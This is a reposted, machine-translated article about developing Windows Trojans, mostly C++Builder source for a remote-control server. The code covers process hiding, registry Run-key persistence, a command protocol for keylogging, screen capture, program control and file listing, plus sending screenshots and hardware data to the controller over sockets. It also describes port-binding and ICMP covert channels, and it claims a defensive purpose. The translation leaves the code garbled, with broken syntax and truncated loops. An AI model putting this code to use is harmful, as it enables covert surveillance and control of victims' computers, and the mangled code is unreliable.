Trojan program development technology: Detailed viral source code

xiaoxiao2021-04-01  218

In recent years, hacker technology has been ripe, and there is a great threat to cyber security. One of the main attack methods of hackers is to use Trojan technology, penetrate into the other's host system, thereby implementing the remote operation target host. Its destructive power is inspiring. How is hacker how to make this kind of destructive Trojan, let's take a detailed analysis of the source code level of Trojans, let us make a development technology of Trojans Thorough perspective, from understanding the wood horse technology, more securely manages its own computer. 1. Trojan's classification Trojan program technology has been developed, and it has experienced 4 generations, the first generation, that is, simple password stealing, sending, etc., there is nothing special. The second generation of Trojans have a great progress in technology, and the Ice can be said to be one of the typical representatives of domestic Trojans. The third generation Trojan has made a small improvement in data delivery techniques, and there is a type of Trojan such as ICMP, and the data is transmitted with malformation, and the difficulty of killing is increased. The fourth-generation Trojan has made a large change in the process of hiding, using the kernel plug-in embedded mode, using remote insertion thread technology, embedding the DLL thread. Or hook PSAPI, implement hidden horses, even under Windows NT / 2000, has reached a good hidden effect. I believe that the fifth generation Trojan will soon be prepared. For more detailed description, you can refer to SHOTGUN's article "Uncover the mystery of Trojans". 2. Trojan's hidden technology Trojan server side, in order to avoid being discovered, most of them have hidden processing, let us take a look at how Trojan is hidden. Speaking of hidden, first understand three related concepts: processes, threads and services. I will explain it. Process: A normal Windows application, after running, you will generate a process in the system, while each process, respectively corresponds to a different PID (Progress ID, Process Identifier), will be allocated by the system Virtual memory space address segments, everything related program operations will be made in this virtual space. Thread: A process, there can be one or more threads, and multiple operations between threads, generally, threads are independent of each other, when a thread is wrong, does not necessarily lead to crash of the entire process . Services: A process When working in a service, it will work in the background without appearing in the list of task, but under Windows NT / 2000, you can still check any service programs through the service manager. Start running. If you want to hide the server side of the Trojan, you can pseudo hide or hide. Pseudo-hidden, means that the process of the program still exists, just let him disappear in the list of processes. True hidden is to make the program completely disappear, do not work in a process or service. The pseudo-hidden method is more easy to implement, as long as the Trojan server-side program is registered as a service, this, the program will disappear from the task list, because the system does not think he is a process, when Press CTRL ALT DELETE, you can't see this program. However, this method only applies to Windows9x systems, for Windows NT, Windows 2000, etc., you will find the service you registered in the system.

Is the pseudo-hidden approach really can't be used under Windows NT / 2000? Of course, there is also a way, that is, the intercept technology of the API, through the establishment of a background system hook, intercepts the function of PSAPI's EnumProcessModules et al. To implement traversal calls for the process and services, when detected process ID (PID) is Trojan The server's server-side process is jumped directly, so that the process is hidden, Jinshan Words and other software are used to use similar methods to intercept the TextOuta, TextOutw function, intercept screen output, to realize instant translation. Similarly, this method can also be hidden in the process. When the process is really hidden, then after the server of this Trojan is running, it should not have a general process, nor should it be available, that is, completely soluble the system's kernel. Maybe you will feel weird, just after the application is running, will you have a process? Indeed, so we can do not make him an app, and do him as a thread, a thread of another application, and inject itself into the address space of other applications. This application is an absolutely secure program for the system, so that the effect of thorough hidden is achieved, which has led to an increase in the difficulty of killing hacker programs. For safety reasons, I only give a method of implementing process pseudo-hidden methods, for more complex, advanced hidden methods, such as methods of moving other processes, such as remote threads, under the NT system Hide and Detection of Trojan Process ".

WinAPI WinMain (Hinstance, Hinstance, LPSTR, INT) {Try {DWORD DWVERSION = getVersion (); // Get Windows version number if (dWVersion> = 0x80000000) // Windows 9X hidden task list {INT (Callback * RSP) DWORD, DWORD); Hinstance DLL = LoadLibrary ("kernel32.dll"); // Load kernel32.dll = (int (callback *) (DWORD, DWORD)) GetProcaddress (DLL, "RegisterServiceProcess"); // Find RSP (NULL, 1); // Register Service FreeLibrary (DLL); // Release DLL Module}} Catch (Exception & Exception) // Handling Exception Event {// Handling Exception Event} Return 0;} 3, program Self-loading technology makes the program self-running method, in addition to the most common method: load program to the startup group, write program start path to the registry HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersions / Run method, There are many other ways, according to Yagami, there are dozens of methods, such as modifying boot.ini, or directly hook through the input method values ​​in the registry, by modifying the Explorer.exe startup parameters, etc. Method, it can really be said to be anti-fighting, the following shows a self-started program by modifying hkey_local_machine / software / run key values: self-loading section: hkey hkey; ansistring newprogramname = Ansistring (SYS) Ansistring (" PNAME /"> // ") PNAME UNSIGNED Long K; K = REG_OPENED_EXISTING_KEY; RegcreateKeyex (HKEY_LO CAL_MACHINE, "SOFTWARE // MICROSOFT // WINDOWS // CURRENTVERSION // RUN //", 0L, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS | KEY_SET_VALUE, NULL, & hkey, & k); RegSetValueEx (hkey, "BackGroup", 0, REG_SZ, NewProgramName .c_str (), newprogramname.length ()); RegcloseKey (HKEY); IF (int (Handle, "Open", newprogramname.c_str (), null, null, sw_hide)> 32) {WantClose = true; Close ();} else {hkey hkey; unsigned long k; k = reg_opened_existing_key; long a =

RegCreateKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE // MICROSOFT // WINDOWS // CURRENTVERSION // RUN", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, & hkey, & k); RegSetValueEx (hkey, "BackGroup", 0, REG_SZ, ProgramName.c_str (); Int Num = 0; char STR [20]; DWORD LTH = 20; DWORD TYPE; CHAR STRV [255]; DWORD VL = 254; DWORD SUC; do {Suc = regenumValue (HKEY_LOCAL_MACHINE NUM, STR, NULL, & TYPE, STRV, & VL); IF (Str, "BGROUP") == 0) {deletefile (ANSISTRING (STRV)); RegdeleteValue (HKEY_LOCAL_MACHINE, "BGROUP"); BREAK }}} While (SUC == Error_Success); REGCLOSEKEY (HKEY);} Self-loading program uninstall code: int Num; char str2 [20]; dword LTH = 20; dword type; char STRV [255]; dword VL = 254; DWORD SUC; Do {Suc = RegenumValue (HKEY_LOCAL_MACHINE, (DWORD) NUM, STR, NULL, & TYPE, STRV, & VL); IF (Strs (Str, "BGROUP") == 0) {Deletefile (Ansistring (STRV) ); Regdeletevalue (HKEY_LOCAL_MACHINE, "BGROUP"); Break;}} wh ile (Suc == ERROR_SUCCESS) HKEY hkey; unsigned long k; k = REG_OPENED_EXISTING_KEY; RegCreateKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE // MICROSOFT // WINDOWS // CURRENTVERSION // RUN", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, & hkey, & K); Do {Suc = RegenumValue (HKEY, (DWORD) NUM, STR, IF (Str, "BackGroup") == 0) {deletefile (ANSISTRING (STRV)); RegdeleteValue (HKEY_LOCAL_MACHINE, "backgroup"); Break;}} while (SUC == Error_Success) RegcloseKey (HKEY); where the self-loading portion uses C Builder to write this, it will be more simplified:

TRegistry & regKey = * new TRegistry (); regKey.RootKey = HKEY_LOCAL_MACHINE; regKey.OpenKey ( "Software // Microsoft // Windows // CurrentVersion // Run", true); if (regKey.ValueExists ( "Interbase Server"! )) {Regkey.writestring ("Interbase Server", "D: // IntrBase // BIN // IBServer.exe");} regkey.closekey (); delete ®Key; 4, Trojan There are many types of data transfer methods for the establishment of the program, which is the most common way to be TCP, UDP transmission data. The API performs data transmission, but because the concealment of this method is relatively poor, it is often easy to check, the easiest, such as using the netstat command in the command line state, you can view the current activity TCP, UDP connection. C: / Documents and Settings / bigball> netstat -n Active Connections Proto Local Address Foreign Address State TCP 192.0.0.9:1032 64.4.13.48:1863 ESTABLISHED TCP 192.0.0.9:1112 61.141.212.95:80 ESTABLISHED TCP 192.0.0.9:1135 202.130.239.223:80 ESTABLISHED TCP 192.0.0.9:1142 202.130.239.223:80 ESTABLISHED TCP 192.0.0.9:1162 192.0.0.8:139 TIME_WAIT TCP 192.0.0.9:1169 202.130.239.159:80 ESTABLISHED TCP 192.0.0.9:1170 202.130. 239.133: 80 Time_Wait C: / Documents and Settings / Bigball>

netstat -a Active Connections Proto Local Address Foreign Address State TCP Liumy: echo Liumy: 0 LISTENING TCP Liumy: discard Liumy: 0 LISTENING TCP Liumy: daytime Liumy: 0 LISTENING TCP Liumy: qotd Liumy: 0 LISTENING TCP Liumy: chargen Liumy: 0 LISTENING TCP Liumy: epmap Liumy: 0 LISTENING TCP Liumy: microsoft-ds Liumy: 0 LISTENING TCP Liumy: 1025 Liumy: 0 LISTENING TCP Liumy: 1026 Liumy: 0 LISTENING TCP Liumy: 1031 Liumy: 0 LISTENING TCP Liumy: 1032 Liumy: 0 LISTENING TCP Liumy: 1112 Liumy: 0 LISTENING TCP Liumy: 1135 Liumy: 0 LISTENING TCP Liumy: 1142 Liumy: 0 LISTENING TCP Liumy: 1801 Liumy: 0 LISTENING TCP Liumy: 3372 Liumy: 0 LISTENING TCP Liumy: 3389 Liumy: 0 LISTENING TCP LiuMy: Netbios-SSN LiUMy: 0 listening TCP LiUMy: 1028 liumy: 0 listening TCP Liumy: 1032 msgr-ns19.msgr.hotmail.com:1863 ESTAB TCP LiUMy: 1112 szptt61.141.szptt.net.cn: http Establi TCP LiuMy: 1135 202.130.239.223:Http Established TCP Liumy: 1142 202.130.239.223:Http Established TCP Liumy: 1162 W3i: Net bios-ssn TIME_WAIT TCP Liumy: 1170 202.130.239.133:http TIME_WAIT TCP Liumy: 2103 Liumy: 0 LISTENING TCP Liumy: 2105 Liumy: 0 LISTENING TCP Liumy: 2107 Liumy: 0 LISTENING UDP Liumy: echo *: * UDP Liumy: discard * : * Udp liumy: daytime *: * UDP liumy: totd *: * udp liumy: epmap *: * udp liun: snmp *: * udp liumy: microsoft-ds *: * udp liumy: 1027 *: * UDP LiUMy: 1029 *: * udp liumy: 3527 *: * udp liumy: 400 *: * UDP LiUMy: 1033 *: * UDP LiUMy: 1148 *: * udp liumy: NetBIOS NS *: * UDP LiUMy: Netbios-DGM *: * UDP LiUMy: Isakmp *: * However, hackers still avoid this reconnaissance, there are more than two methods I know, one is a combined port method. That is to say, use special means to bind two TCP or UDP connections on a port, which sounds incredible, but in fact, this is true,

And there have been programs that use similar methods, bind their Trojan ports above the specific service port, (such as HTTP of the 80-port, who doubts that he will be a Trojan program?) Thus reaching the hidden port. Another way is to send data from the ICMP (Internet Control Message Protocol) protocol, the principle is to modify the structure of the ICMP header, join the Trojan control field, such a Trojan, with a lot of new features, not occupying the characteristics of the port, User users can not find out, while using ICMP can penetrate some firewalls, thereby increasing the difficulty of preventing prevention. The reason why this feature is because ICMP is different from TCP, UDP, and ICMP works in the network's application layer does not use TCP protocols. Regarding the structure of the network level, the illustration is given: Network Hierarchy Figure 5, an organizational method of transmitting data about data, can be said to be a mathematical problem. The key is to deliver the reliability, compression, and efficient line of data.

Trojans, in order to avoid being found, you must control the amount of data transfer, a good Trojan, often have your own transfer agreement, then how to organize the implementation? Below, I will give some protocols: typedef struct {// Define message structure // char ip [20]; char Type; // message type char password [20]; // password int CNUM; // message Operation number // INT length; // message length} msg; #define msglen sizeof (msg) // ----------------------------- ------------ // dialog box packet definition: DLG_MSG_Type.H // ------------------------- ------------------ // Define the following message Type: #define msgdlgcommon 4 // Connection Event #define msgdlgsend 5 // Send Complete Event // Message Typedef struct {char Name [20]; // Dialog Title Char MSG [256]; // Dialog Box Message} msgdlguint; #define msgdlglen sizeof (msgdlguint) // Message unit length // ----------- ------------------------------ // Chat packet definition: chat_msg_type.h // ------- --------------------------------- / / Define the following message Type: #define msgchatcommon 0 // Connecting event #define msgchatconnect 1 // Access Event #define msgchatescest 2 // End Event #define MsgCHRECEIVED 16 // Confirmation Content Receive // ​​Message TypeDef Struct {Char ClientName [20]; // Client Custom Name Char MSG [256]; // Send message} msgchatuint; #define msgchatlen sizeof (msgchatuint) // Message cell length // ------------------------ ------------------ // Enterprise Packet Definition: Reboot_MSG_Type.H / / -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- - // Define the following message type: #define msgreboot 15 // Restart event // -------------------------------------------------------------------------------------------------------------------------- ----------- // directory structure request packet definition: DIR_MSG_TYPE.H / / ------------------------- ---------------- // Define the following message Type: #define msggetdirinfo 17 #define msgreceivegetdirinfo 18 typef struct {char dir [4096]; // You want the directory name} msgdiruint ; #Define msgdiruintlen sizeof (msgdiruint) // TCP msg typef struct {// defines message structure char stype; // message type char spassword [20]; // password // int SNUM; // message Operation number char * allmsg } SMSG;

#define SMsgLen sizeof (SMsg) #define MSGListProgram 19 #define MSGFlyMouse 21 #define MSGGoWithMouse 22 #define MSGSaveKey 23 #define MSGTracekey 24 #define MsgCopyScreen 25 // tcp received message, udp request message #define MSGCopyWindow 26 // ---- --------------------- // Mouse pointer hidden and display control // ----------------- ------ #define MsgSetMouseStat 27 // 28 // setup message success message MsgMouseStat #define typedef struct {bool mouseshow;} MsgSetMouseStatUint; #define MsgSetMouseStatUintLen sizeof (MsgSetMouseStatUint) Previous 1234567 next Page / / ------------------------- // Taskbar hidden and display control // ------------ ------------- #define MsgSetTaskBarStat 29 // 30 // setup message success message MsgTaskBarStat #define typedef struct {bool taskshow;} MsgSetTaskBarStatUint; #define MsgSetTaskBarStatUintLen sizeof (MsgSetTaskBarStatUint) // --- ---------------------- // Get machine name // --------------------- ---- #define msggetNetBiosName 31 // Remove the #define msgnetbiosName 32 // Turn the machine name TypeDef struct {char NetbiosName [128]; #define msgnetbiosnameuintlen sizeof (msgnetbiosnameuint) // ------------------------- // Close process change! // ---------- ----------------- #define msgSetProgramClose 33 // Close Request #define msgprogramclosed 34 // Success message ----- typef struct {char program [4096]; // old Struct: char program [128]; // To close the name of the window} msgSetProgramCloseuint; #define msgsetprogramcloseuintlen sizeof (msgSetProgramCloseuint) // ------------------------------------------------------------------------------------------------ --- // Open process change! // ------------------------- #Define msgSetProgramopen 20 // Open request #define msgprogrampened 36 // Success message typef struct {char program [4096]; // old struct: char program [128]; // The name of the program to open BOOL Programshow; // front run or background running program (hidden run)} msgSetProgramopenuint;

#define MsgSetProgramopenuintlen SizeOf (MsgSetProgramopenuint) #define Msggethardware 35 // Request Hardware Information (UDP Message) and Rehabilitation Hardware Information (TCP Message) The above definition is used to use TCP and UDP's objective purpose to reduce TCP connections. This consumed system resource will be less, it is not easy to let the target aware. Many Trojans have similar password definitions in the above definition, which is to prevent connection requests for non-real clients. Snum is the message operator number, its role is to test whether the data is transmitted, knows that the OICQ we are familiar with is also using this way to check the message.

The data protocol is organized, and there is another step in work, that is, the data packaging transmission, the general method is to press all the data into a VOID type data stream, then send: msg * msg = new msg; tmemorystream * RData = new TMEMORYSTREAM; NMUDP1 -> readStream (RData); RData-> Read (msg, sizeof (Msg)); UdpConnect * udpcon_nect = new UdpConnect; NetBiosName * netbiosname = new NetBiosName; if (msg-> CNum == CNumBak) return; else {CNumBak = MSG-> cnum; switch (msg-> type) {case 0: // msgudpConnect RData-> read (udpConnect, sizeof (udpconnect)); Checkuser (udpconnect-> isright); Break; Case 1: RData-> Read ( NetbiosName, SizeOf (NetbiosName)); Ansistring JQM = "Machine Name"; JQM = (ANSISTRING) NetBiosName-> NetBiosName; Memo2-> Lines-> Add (jqm); Break;}}) When the server receives data The first thing to do is to unpack the reduced VOID stream as a structured agreement. Here is the example code: nmudp1-> remotehost = fromip; nmudp1-> remoteport = port; tmemorystream * rData = new TMEMORYSTREAM; nmudp1-> readstream (RDATA); msg * msg = new msg; RData-> Read (MSG, SIZEOF (MSG)); if (msg-> cnum == cnumbak) Return; Else {CNUMBAK = MSG-> CNUM; Switch (msg-> TYPE) {cas 0: Checkuser (msg-> password); Break; Case 1: getNetbiosName (); Break; Case 2: checkhard (); break;}} In addition, many Trojans support the feature of the screen. The fundamental principle is to capture the screen picture first, then return to the customer. Machine, due to the large amount of data, many Trojans are simply retrieving the picture when the screen changes, and the common means is the minimum rectangular method, and the following is an algorithm for the "Ancient Legend": # Define maxxcount 10 // screen X direction Up to #define maxycount 5 // ... Y ................ #define destnum 1000 // Offset detection per piece The maximum number of points COLORREF Colors [MAXXCount] [MAXYCount] [DestNum]; COLORREF BakColors [MAXXCount] {MAXYCount] [DestNum]; TPoint Dests [DestNum]; int Sw; int Sh; int xCount; int yCount; int ItemWidth;

INT ITEMHEIGHT; INT DNUM; INT QLITY; // After the message is performed: // Further: DNUM, QLITY / / DNUM: Offset Object Number // qlity: Image Requirements Quality__fastcall TFORM1 :: Copyspace {itemwidth = sw / xcount; itemHeight = sh / ycount; sw = screen-> width; sh = screen-> height; xcount = (SW> 1000)? 8: 6; Ycount = (SH> 1000)? 3: 2; for (int Num1 = 0; Num1 dests [Num1] .x = random (itemwidth); dests [Num1] .y = random (itemHeight);} catchscreen (DNUM, QLITY );} // only execute after receiving the brush screen message: Catchscreen (DNUM, QLITY); __fastcall tform1 :: CatchScreen (int DNum, int qlity) {// function function: Scan change screen area, and cut the optimization process Finally, send these area data // DNUM: Offset QLITY: Image Quality HDC DC = Getdc (getDesktopWindow ()); graphics :: tbitmap * bm = new graphics :: tbitmap; bm-> width = sw; bm- > Height = sh; Bitblt (BM-> Canvas-> Handle, 0, 0, SW-1, SH-1, DC, 0, 0); Int Num1, Num2, Num3; Int Nowx, Nowy; Bool Change; Bool ItemChange [MAXYCOUNT]; for (Num1 = 0; Num1 NOWX = ItemWidth * Num1; for (Num2 = 0; Num2 nowy = itemHeight * Num2; Change = false; for (Num3 = 0; Num3 colors [Num1] Num2] [NUM3] = B M-> Canvas-> Pixels [NOWX DESTS [NUM3] .X] [NOWY DESTS [Num3] .y]; if (Colors [Num1] [Num2] [Num3]! = Bakcolors [Num1] [Num2] Num3]) {BakColors [Num1] [Num2] [Num3] = Colors [Num1] [Num2] [Num3]; itemchange [Num1] [Num2] = true;}}}} int CNUM, MAXCNUM; int ChangedNum = 0; TRECT * RECT; INT Num4; int minsize = 10000; int m; trect minRect; graphics :: tbitmap * bt2 = new graphics :: tbitmap; tjpegimage * j = new tjpegimage; // ********* ************** J-> Quality = QLITY; // ****************************************** COPYSCREENUINT COPYSCREEN

CopyScreenItemUint CopyScreenItem; TMemoryStream * ms = new TMemoryStream; ms-> Write (& TcpMsg, sizeof (TcpMsgUint)); ms-> Write (& CopyScreen, sizeof (CopyScreenUint)); do {for (num1 = 0; num1 for (num2 = 0 Num2 for (Num3 = Num1 1; Num3 <= xcount; Num3 ) {MaxCnum = 0; for (Num4 = Num2 1; Num4 <= Ycount; Num4 ) {// Traverse All Rectangles CNUM = GetChangeDnum (TRECT (TRECT (TRECT (Num1 , Num2, Num3, Num4); if (cnum> maxcnum) Maxcnum = cnum; m = (Num3-Num1) * (Num4-Num2); if (2 * m-cnum minsize = 2 * m-cnum; minRect = TRECT (NUM1, NUM2, NUM3, NUM4);}}} TMEMORYSTREAM * MS; Bitblt (BT2-> Canvas-> Handle, 0, 0, Itemwidth-1, ItemHeight-1, Bt-> Canvas-> Handle, 0, 0); J-> Assign (BT2); J-> SaveTream (MS2); COPYSCREENITEM.RECT ​​= TRECT (NUM1, NUM2, NUM3, NUM4); COPYSCREENITEM.FILETYPE = JPEGFILE; // jpegfile defined as: #define JPEGFILE 1 MS2-> position = 0; coupyscreenItem.length = ms2-> size; ms-> write (& copyspace); ms-> CopyFrom (ms2, ms2-> size); ChangedNum ;} while (maxcnum> 0 ); Tcpmsg.Type = msgcopyscreen; ms-> position = 0; tcpmsg .Length = ms-> Size-sizeof (TcpMsgUint); CopyScreen.Count = ChangedNum; ms-> Write (& TcpMsg, sizeof (TcpMsgUint)); ms-> Write (& CopyScreen, sizeof (CopyScreenUInt)); ms-> Position = 0; SOCK-> SendStream (MS);} 6, the acquisition of the target machine

Compared to the above part, the method implemented here is much simpler. This segment will be relaxed, and the method of acquiring the machine is to call the associated API, this is very similar to the application.

ANSISTRING CS;

File * fp;

FP = fopen ("Temp.had", "W ");

// Todo: Add your source code here

// Get the CPU model

System_info systeminfo;

GetSystemInfo (& SystemInfo);

Cs = "CPU type is:" string (systeminfo.dwprocessortype) "/ n"; fwrite (cs.c_str (), cs.length (), 1, fp);

MemoryStatus memory;

Memory.dwlength = sizeof (memory); // Initialization

GlobalMemoryStatus (& Memory);

CS = "Physical Memory is (MB):" String (INT (Memory.dwtotalphys / 1024/1024)) "/ n";

FWRITE (cs.c_str (), cs.length (), 1, fp);

Cs = "Available Memory is (KB):" String (int (Memory.dwavailphys / 1024) "/ n";

FWRITE (cs.c_str (), cs.length (), 1, fp);

DWORD SECTOR, BYTE, Cluster, Free;

Long Int FreeSpace, Totalspace;

Uint type;

CHAR NAME;

// 0- Unknown Disk, 1- does not exist, 2-removable disk, 3-fixed disk, 4-network disk,

// 5-CD-ROM, 6-memory virtual disk

Char Volname [255], FileName [100]; // Buffer [512];

DWORD SNO, MAXL, FILEFLAG;

For (name = 'a'; name <= 'z'; name ) {// cycle detection a ~ z

Type = getDriveType (ANSISTRING (Ansistring (Name) ':'). c_str ()); // Get Disk Types

IF (Type == 0) {

CS = "Unknown Type Disk:" String (Name) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

Else if (Type == 2) {

CS = "removable type disk:" string (name) "/ n";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

Else if (Type == 3) {

CS = "Fixed Disk:" String (Name) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

ELSE IF (Type == 4) {

CS = "Network Mapping Disk:" String (Name) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

Else if (Type == 5) {

CS = "CD-ROM:" String (Name) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

Else if (Type == 6) {

CS = "Memory Virtual Disk:" String (Name) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

IF (GetVolumeInformation ((String (Name)). C_STR (), Volname, 255, & Sno, & Maxl, & FileFlag, FileName, 100)) {

CS = String (Name) "Disk Tag is:" String (Volname) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

CS = String (Name) "Put No. Sequence is:" String (SNO) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

GetDiskFreespace (String (Name) String (':')). C_str (), §OR, & BYTE, & Free, & Cluster; // Get return parameters

Totalspace = int (cluster) * Byte * SECTOR / 1024/1024; // Calculation total capacity

Freespace = int (free) * byte * Sector / 1024/1024; // Calculate free space

CS = string (name) string (':') "disk total space (MB):" ANSISTRING (TOTALSPACE) "/ n";

FWRITE (cs.c_str (), cs.length (), 1, fp);

CS = String (Name) String (':') "Disc Space (MB):" Ansistring (FreeSpace) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

}

INT Wavedevice, Mididevice;

Waveoutcaps Wavecap;

Midioutcaps Midicap;

WaveDevice = (int) WaveoutGetNumdevs (); // Waveform device information

Mididevice = (int) midiOutGetNumdevs (); // MIDI device information

IF (WaveDevice! = 0) {

WaveOutgetDevcaps (0, & Wavecap, Sizeof (WaveoutCaps);

CS = "Current Waveform Device:" String (Wavecap.Szpname) "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

IF (MIDIDEVICE! = 0) {

MIDIOUTGETDEVCAPS (0, & Midicap, Sizeof (Midioutcaps);

CS = "Current MIDI device:" string (midicap.szpname) "/ n";

FWRITE (cs.c_str (), cs.length (), 1, fp);

}

Long Double TCS;

Long Double TC;

Long Int BPP, CP;

CS = "Current resolution is:" string (screen-> width) Ansistring ("*") string (screen-> height) "/ n";

FWRITE (cs.c_str (), cs.length (), 1, fp);

BPP = getDevicecaps (canvas-> handle, bitspixel);

TCS = POW (2, bpp); // Calculate the gradient number of colors

CP = getDeviceCaps (Form1-> Canvas-> Handle, Plaso);

Tc = Pow (Double (TCS), Double (CP)); / / Calculating color depth

Ansistring sss;

SSS = BPP; CS = "The current color depth is:" SSS "/ N";

FWRITE (cs.c_str (), cs.length (), 1, fp);

Fclose (fp);

Ansistring filename = "temp.had";

CHAR * BUF;

TCPMSGUINT MSG2;

STRCPY (Msg2.tpassword, Password);

TMEMORYSTREAM * MS = New TMEMORYSTREAM;

MS-> CLEAR ();

IF (! FileExists (fileEname)) checkhard ();

TFileStream * fs = new TFileStream (FileName, FmopenRead);

Previous 1 2 3

BUF = New char [fs-> size sizeof (tcpmsguint) 1];

FS-> read (buf, fs-> size);

Msg2.type = msggethardware;

Msg2.Length = fs-> size;

FILECLOSE (fs-> handle);

MS-> Write (& MSG2, SIZEOF (TCPMSGUINT));

MS-> Write (buf, msg2.length);

MS-> POSITION = 0;

DELETE [] BUF;

Try {

SOCK-> SendStream (MS);

}

Catch (Exception & E) {

}

}

As a program, it basically takes the relevant system information.

7, server-side program packaging and encryption

People who have used the Ice King know that the ice river allows the user to customize the port number. The purpose of this is to prevent it from being detected by the anti-black program. How is this function?

Let us first make an experiment:

Do as follows in command line mode of Windows

1) C: /> COPY Server.exe Server.bak

2) Establish a text file Test.txt, its content is "http://www.patching.net"

3) C: /> Type text.txt >> Server.exe

4) Run Server.exe

how about it? Is it found that server.exe still can still run? The mysteries of the Trojan server are here: First, it has become an exe file. There is an operation of reading the contents of the process. When reading, the file pointer directly points to the end of the process, the countdown N of the end User-customized information is obtained at the byte, such as port numbers, etc., and then passed to the relevant part of the program for processing. Not given the relevant code part, interested friends, please refer to some file package code, the technique used is small.

8, summary

Some techniques described above basically include all the characteristics of all second generation Trojans, individual Trojans support server lists, macro propagation, etc., realization of the same size. With the continuous update and development of technology, it is not far from the days of the fifth generation of Trojans, black and anti-black, so reciprocated, it seems that the road to anti-black work is still very long, from the fundamental Only to prevent Trojans, only start from our own understanding of Trojans, I hope this article will bring you some anti-black technical assistance after you read.

转载请注明原文地址:https://www.9cbs.com/read-131258.html

New Post(0)